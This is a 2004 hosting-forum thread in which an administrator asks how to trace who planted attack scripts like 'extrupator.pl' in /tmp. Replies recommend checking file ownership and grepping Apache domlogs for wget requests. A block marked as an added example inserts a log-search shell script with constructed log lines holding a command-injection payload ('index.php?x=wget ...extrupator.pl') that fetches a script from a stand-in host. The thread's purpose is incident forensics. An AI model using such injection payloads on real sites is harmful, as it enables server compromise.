The Community Forums

how to track hacker?

Discussion in 'General Discussion' started by 10101, Jun 14, 2004.

  1. 10101

    10101 Well-Known Member

    Joined:
    Sep 4, 2003
    Messages:
    151
    Likes Received:
    0
    Trophy Points:
    166
    Hi,

    I keep seeing files like "extrupator.pl" in my tmp folder which are attempts to hack the server.

    I think they are uploaded through a site which has a vulnerable script, but I am not sure what commands to run to catch this little sod.

    What lines should I run to find out who uploaded/ran extrupator.pl?
     
  2. AlexSmithMCP

    AlexSmithMCP Well-Known Member

    Joined:
    May 26, 2004
    Messages:
    66
    Likes Received:
    0
    Trophy Points:
    156
    cPanel Access Level:
    Root Administrator
    You could replace the script with one that logs their IP as well as the hostname it was run through (I think that can be done); that should help you find them :) Make sure it emails it to an off-site email address though....
     
  3. 10101

    10101 Well-Known Member

    Joined:
    Sep 4, 2003
    Messages:
    151
    Likes Received:
    0
    Trophy Points:
    166
    That would be cool, where would I get such a script?
     
  4. sawbuck

    sawbuck Well-Known Member

    Joined:
    Jan 18, 2004
    Messages:
    1,366
    Likes Received:
    6
    Trophy Points:
    168
    cPanel Access Level:
    Root Administrator
  5. 10101

    10101 Well-Known Member

    Joined:
    Sep 4, 2003
    Messages:
    151
    Likes Received:
    0
    Trophy Points:
    166
  6. Ben

    Ben Well-Known Member

    Joined:
    Aug 19, 2002
    Messages:
    77
    Likes Received:
    0
    Trophy Points:
    156
    If you are using phpSuExec, then determining the vulnerable site is easy.

    If you aren't, it's harder.

    If you are, run

    ls -la file.pl

    That should tell you the owner of the file.

    Then go to /usr/local/apache/domlogs/ and run

    grep wget `ls | grep username`

    This should then show all instances where attempts to wget a file were logged. This is usually a good indication of a vulnerable script, usually something like

    index.php?x=wget bad file

    What you do with the site from there is up to you.

    If you don't use phpSuExec, then you can run the following; please note that this command can be load-intensive and take a while to run

    grep filename.pl *.com

    If there are no results, proceed to other TLDs on your machine, e.g.

    grep filename.pl *.net

    That will show you instances where most likely the file was wget'ed, and can also determine the site; yet again, what to do with it is up to you.

    HTH,

    Ben
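
Added example, not part of the original posts: the domlog search described above done as one pass over every per-domain log regardless of TLD, listing the client IP and request for each hit and ranking sites by hit count. The function names, sample log lines, IPs and domains are constructed for illustration; it assumes one access log per domain in a single directory, as under /usr/local/apache/domlogs/.

```sh
#!/bin/sh
# Added example. Assumes one Apache access log per domain in one directory,
# as under /usr/local/apache/domlogs/. All names and sample data are constructed.

# Print "logfile<TAB>client_ip<TAB>request" for each logged request that mentions
# "wget" or the dropped file's name ($2). Optional $3 limits the search to logs
# whose name contains that string (the phpSuExec case, where the owner is known).
find_fetch_requests() {
    find "$1" -maxdepth 1 -type f -name "*${3:-}*" -exec awk -v name="$2" '
        index(tolower($0), "wget") || index($0, name) {
            site = FILENAME; sub(/.*\//, "", site)  # log file name only
            split($0, q, "\"")                       # q[2] = quoted request line
            printf "%s\t%s\t%s\n", site, $1, q[2]
        }' {} +
}

# Rank logs (one per site) by number of matching requests: "count logfile".
suspect_sites() {
    find_fetch_requests "$@" | cut -f1 | sort | uniq -c | sort -rn |
        awk '{ print $1, $2 }'
}

# Write constructed sample logs into directory $1 (documentation IPs/domains).
write_sample_logs() {
    cat > "$1/shop.example.com" <<'EOF'
198.51.100.4 - - [14/Jun/2004:09:58:01 +0000] "GET /index.php HTTP/1.1" 200 4312
203.0.113.7 - - [14/Jun/2004:10:02:11 +0000] "GET /index.php?x=wget%20http://files.example/extrupator.pl HTTP/1.0" 200 512
203.0.113.99 - - [14/Jun/2004:10:07:45 +0000] "GET /index.php?x=wget%20http://files.example/extrupator.pl HTTP/1.0" 200 512
EOF
    cat > "$1/blog.example.net" <<'EOF'
198.51.100.9 - - [14/Jun/2004:10:01:00 +0000] "GET /about.html HTTP/1.1" 200 2048
EOF
}

# Demo run on the constructed logs.
demo_dir=$(mktemp -d)
write_sample_logs "$demo_dir"
find_fetch_requests "$demo_dir" extrupator.pl
suspect_sites "$demo_dir" extrupator.pl
rm -rf "$demo_dir"
```

Keep a copy of the matching log lines off the server before cleaning up, since the logs in that directory rotate.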
     
  7. sawbuck

    sawbuck Well-Known Member

    Joined:
    Jan 18, 2004
    Messages:
    1,366
    Likes Received:
    6
    Trophy Points:
    168
    cPanel Access Level:
    Root Administrator
  8. 10101

    10101 Well-Known Member

    Joined:
    Sep 4, 2003
    Messages:
    151
    Likes Received:
    0
    Trophy Points:
    166